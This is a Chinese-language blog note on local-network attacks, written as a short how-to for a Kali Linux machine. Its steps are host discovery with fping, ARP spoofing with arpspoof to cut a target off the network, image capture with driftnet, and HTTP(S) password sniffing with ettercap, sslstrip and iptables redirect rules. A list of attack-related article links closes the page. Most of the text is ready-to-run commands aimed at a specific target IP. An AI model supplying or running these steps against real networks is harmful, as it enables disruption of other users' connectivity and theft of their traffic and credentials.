局域网攻击笔记
2023-06-13 09:12:18 时间
文章最后更新时间为:2018年08月14日 11:13:57
攻击环境 kali虚拟机 网卡 eth0 目标ip 192.168.1.145 网关 192.168.1.1
1. 寻找局域网其他主机
fping -asg 192.168.1.0/24
2.局域网断网攻击
arpspoof -i 网关 -t 目标ip 网关
arpspoof -i eth0 -t 192.168.1.145 192.168.1.1
原理
目标--> 我的网卡--> 网关
可能发生arpspoof: couldn't arp for host 错误:
- 保证虚拟机和目标主机可以ping的通
- 换成桥接模式
3. 获取图片
先ip转发
echo 1 >/proc/sys/net/ipv4/ip_forward
再欺骗
arpspoof -i eth0 -t 192.168.1.145 192.168.1.1
再开启相应程序获取图片密码等
driftnet -i eth0
driftnet --> 获取本地网卡的图片
4. 查看http(s)密码
工具:arpspoof、ettercap、sslstrip
编辑etter.conf文件,启用linux的iptables(如果是HTTPS需要此步骤,HTTP不需要);
vim /etc/ettercap/etter.conf
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
开启数据转发:
echo 1 > /proc/sys/net/ipv4/ip_forward
开启Arp欺骗:
arpspoof -i eth0 -t 192.168.0.78 192.168.0.254
将HTTPS还原为HTTP
sslstrip -a -f -k
(缺点:容易出现证书错误)
开始抓包:
ettercap -Tq -i eth0
注:实际测试中,http协议可以正常抓取,但是https协议情况下,所有主流现代浏览器都发出安全警示,并禁止继续访问。
相关文章
- Redirect攻击原理介绍和利用
- 我的网站第一次被攻击了
- 用VERYNGINX 防御CC攻击
- XSS跨站攻击靶场-通关笔记
- 《2022年度区块链安全及反洗钱分析》发布,漏洞利用是最常见攻击方法
- 第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)
- 新型 "HinataBot "僵尸网络可以发动大规模的DDoS攻击
- 服务器FTP攻击导致Linux服务器面临的威胁(ftp入侵linux)
- 英特尔处理器 CacheOut 漏洞攻击曝光 修复正在路上
- essyn DDOS攻击.c
- Mysql防注入攻击指南,保护您的数据库安全(mysql搜索注入)
- MSSQL盲注攻击:从单个数据库到多库的安全漏洞探索(mssql盲注多个数据库)
- 防止Redis攻击策略与实践(如何防止redis攻击)
- 课程报名丨富数科技卞阳:如何站在金融「上帝视角」,进行降维攻击?
- IIS&Apache攻击记录分析篇